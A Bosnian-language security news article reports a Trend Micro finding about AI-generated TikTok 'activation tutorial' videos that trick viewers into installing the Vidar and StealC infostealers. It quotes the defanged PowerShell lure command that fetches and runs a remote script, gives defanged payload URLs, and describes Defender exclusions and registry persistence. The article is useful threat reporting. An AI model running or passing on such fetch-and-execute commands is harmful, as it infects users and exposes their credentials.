Prevaranti su otkrili novo polje za distribuciju malvera, koristeći ogromnu bazu korisnika i algoritamski doseg TikToka.
Pojavila se sofisticirana kampanja društvenog inženjeringa koja koristi video snimke generisane vještačkom inteligencijom kako bi prevarila korisnike da preuzmu opasan malver za krađu informacija, maskiran kao tutorijali za aktivaciju softvera.
Ovi obmanjujući video snimci obećavaju pomoć korisnicima u aktiviranju legitimnih aplikacija poput Windows OS, Microsoft Office, CapCut i Spotify, ali umjesto toga isporučuju zloglasne Vidar i StealC “infosteler” malvere neopreznim žrtvama.
Ova kampanja predstavlja značajan napredak u taktikama distribucije malvera, udaljavajući se od tradicionalnih metoda isporuke putem web stranica i eksploatišući povjerenje i angažman inherentne u platformama društvenih medija.
Za razliku od uobičajenih napada koji se oslanjaju na maliciozne web stranice ili phishing putem e-pošte, ova operacija ugrađuje sve elemente društvenog inženjeringa direktno u video sadržaj, čineći detekciju znatno težom za sigurnosna rješenja.
Napadači iskorištavaju viralnu prirodu TikToka, pri čemu je jedan maliciozni video prikupio skoro 500.000 pregleda, preko 20.000 lajkova i više od 100 komentara, što pokazuje alarmantan doseg i efikasnost kampanje.
Analitičari kompanije Trend Micro identifikovali su više TikTok naloga uključenih u ovu operaciju, uključujući @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc i @digitaldreams771, koji su od tada deaktivirani.
Istraživači su primijetili da su ovi nalozi objavljivali primjetno slične video snimke bez lica, sa glasovima generisanim vještačkom inteligencijom, što ukazuje na automatizovani proces proizvodnje dizajniran za skaliranje.
Tehnička sofisticiranost napada postaje očigledna kroz njegovu metodologiju izvršavanja.
Žrtvama se nalaže da otvore PowerShell i izvrše naizgled bezazlenu komandu: `iex (irm hxxps://allaivo[.]me/spotify)`. Ovaj PowerShell skript pokreće višefazni proces infekcije koji demonstrira napredne tehnike izbjegavanja.
Mehanizam infekcije i taktike postojanosti
Lanac infekcije malvera otkriva pažljivo orkestrirane korake dizajnirane da osiguraju uspješnu kompromitaciju uz izbjegavanje detekcije.
Po izvršenju, početni PowerShell skript kreira skrivene direktorijume unutar korisnikovih APPDATA i LOCALAPPDATA foldera, odmah dodajući te lokacije na listu izuzetaka Windows Defendera kako bi se spriječilo skeniranje antivirusa.
Zatim skript preuzima primarni teret sa `hxxps://amssh[.]co/file.exe`, koji sadrži varijante malvera Vidar ili StealC.
Mehanizam postojanosti uključuje preuzimanje dodatnog PowerShell skripta sa `hxxps://amssh[.]co/script[.]ps1` i uspostavljanje ključa registra koji osigurava da se malver izvršava pri pokretanju sistema.
Značajno je da Vidar koristi inovativnu strategiju komande i kontrole, zloupotrebljavajući legitimne usluge poput Steam profila i Telegram kanala kao “Dead Drop Resolvers” za skrivanje stvarnih adresa C&C servera, čineći napore detekcije i uklanjanja znatno složenijim.
